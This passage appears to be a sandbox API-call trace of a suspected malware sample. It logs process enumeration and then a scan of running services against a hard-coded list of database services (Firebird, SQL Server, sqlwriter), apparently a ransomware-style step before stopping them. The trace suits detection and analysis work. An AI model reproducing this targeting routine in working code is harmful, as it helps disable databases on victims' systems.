pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0051.633] lstrlenW (lpString="SearchUI.exe") returned 12 [0051.633] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0051.633] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0051.633] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0051.634] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0051.634] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0051.635] lstrlenW (lpString="taskhostw.exe") returned 13 [0051.635] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0051.635] lstrlenW (lpString="UsoClient.exe") returned 13 [0051.635] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0051.636] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0051.636] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0051.637] lstrlenW (lpString="taskhostw.exe") returned 13 [0051.637] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0051.638] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0051.638] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0051.638] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0051.639] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0051.639] lstrlenW (lpString="msoia.exe") returned 9 [0051.639] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0051.640] lstrlenW (lpString="msoia.exe") returned 9 [0051.640] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0051.641] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0051.641] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0051.641] lstrlenW (lpString="screensaver.exe") returned 15 [0051.641] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0051.642] lstrlenW (lpString="xml upper.exe") returned 13 [0051.642] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0051.643] lstrlenW (lpString="defeat preston.exe") returned 18 [0051.643] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0051.644] lstrlenW (lpString="boss isolated.exe") returned 17 [0051.644] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0051.645] lstrlenW (lpString="member.exe") returned 10 [0051.645] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0051.645] lstrlenW (lpString="chubby-er.exe") returned 13 [0051.645] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0051.646] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0051.646] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0051.647] lstrlenW (lpString="organization.exe") returned 16 [0051.647] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0051.647] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0051.648] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0051.648] lstrlenW (lpString="spray-roman.exe") returned 15 [0051.648] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0051.649] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0051.649] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0051.650] lstrlenW (lpString="tank attacks.exe") returned 16 [0051.650] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0051.651] lstrlenW (lpString="wires jacket.exe") returned 16 [0051.651] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0051.651] lstrlenW (lpString="values.exe") returned 10 [0051.651] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0051.652] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0051.652] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0051.653] lstrlenW (lpString="printersaerospace.exe") returned 21 [0051.653] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0051.654] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0051.654] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0051.655] lstrlenW (lpString="dllhost.exe") returned 11 [0051.655] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0051.656] lstrlenW (lpString="joke.exe") returned 8 [0051.656] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0051.656] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0051.656] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0051.657] lstrlenW (lpString="documents.exe") returned 13 [0051.657] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0051.658] lstrlenW (lpString="rebel.exe") returned 9 [0051.658] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0051.659] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0051.659] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.660] lstrlenW (lpString="conhost.exe") returned 11 [0051.660] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.660] lstrlenW (lpString="conhost.exe") returned 11 [0051.660] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0051.661] lstrlenW (lpString="hgaibc.exe") returned 10 [0051.661] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.662] lstrlenW (lpString="cmd.exe") returned 7 [0051.662] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0051.663] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0051.663] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.663] lstrlenW (lpString="conhost.exe") returned 11 [0051.663] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.664] lstrlenW (lpString="conhost.exe") returned 11 [0051.664] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.665] lstrlenW (lpString="svchost.exe") returned 11 [0051.665] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0051.666] CloseHandle (hObject=0x324) returned 1 [0051.666] Sleep (dwMilliseconds=0x1f4) [0052.169] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea98 [0052.170] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0052.170] GetLastError () returned 0xea [0052.170] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0052.170] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0052.171] CloseServiceHandle (hSCObject=0x60ea98) returned 1 [0052.171] lstrlenW (lpString="Appinfo") returned 7 [0052.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0052.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0052.171] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0052.171] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0052.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0052.171] lstrlenW (lpString="AppXSvc") returned 7 [0052.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0052.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0052.171] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0052.171] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0052.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0052.171] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0052.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.171] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0052.171] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0052.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0052.172] lstrlenW (lpString="Audiosrv") returned 8 [0052.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0052.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0052.172] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0052.172] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0052.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0052.172] lstrlenW (lpString="BFE") returned 3 [0052.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0052.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0052.172] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0052.172] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0052.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0052.172] lstrlenW (lpString="BITS") returned 4 [0052.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0052.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0052.172] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0052.172] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0052.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0052.172] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0052.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0052.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0052.172] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0052.172] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0052.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0052.172] lstrlenW (lpString="CDPSvc") returned 6 [0052.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0052.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0052.172] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0052.172] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0052.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0052.172] lstrlenW (lpString="ClickToRunSvc") returned 13 [0052.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0052.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0052.172] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0052.172] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0052.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0052.173] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0052.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0052.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0052.173] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0052.173] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0052.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0052.173] lstrlenW (lpString="CryptSvc") returned 8 [0052.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0052.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0052.173] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0052.173] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0052.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0052.173] lstrlenW (lpString="DcomLaunch") returned 10 [0052.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.173] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0052.173] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0052.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0052.173] lstrlenW (lpString="DeviceAssociationService") returned 24 [0052.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0052.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0052.173] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0052.173] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0052.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0052.173] lstrlenW (lpString="Dhcp") returned 4 [0052.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0052.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0052.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0052.173] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0052.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0052.173] lstrlenW (lpString="Dnscache") returned 8 [0052.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0052.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0052.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0052.174] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0052.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0052.174] lstrlenW (lpString="DoSvc") returned 5 [0052.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0052.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0052.174] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0052.174] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0052.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0052.174] lstrlenW (lpString="DPS") returned 3 [0052.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0052.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0052.174] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0052.174] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0052.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0052.174] lstrlenW (lpString="DusmSvc") returned 7 [0052.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0052.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0052.174] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0052.174] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0052.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0052.174] lstrlenW (lpString="EventLog") returned 8 [0052.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0052.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0052.174] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0052.174] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0052.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0052.174] 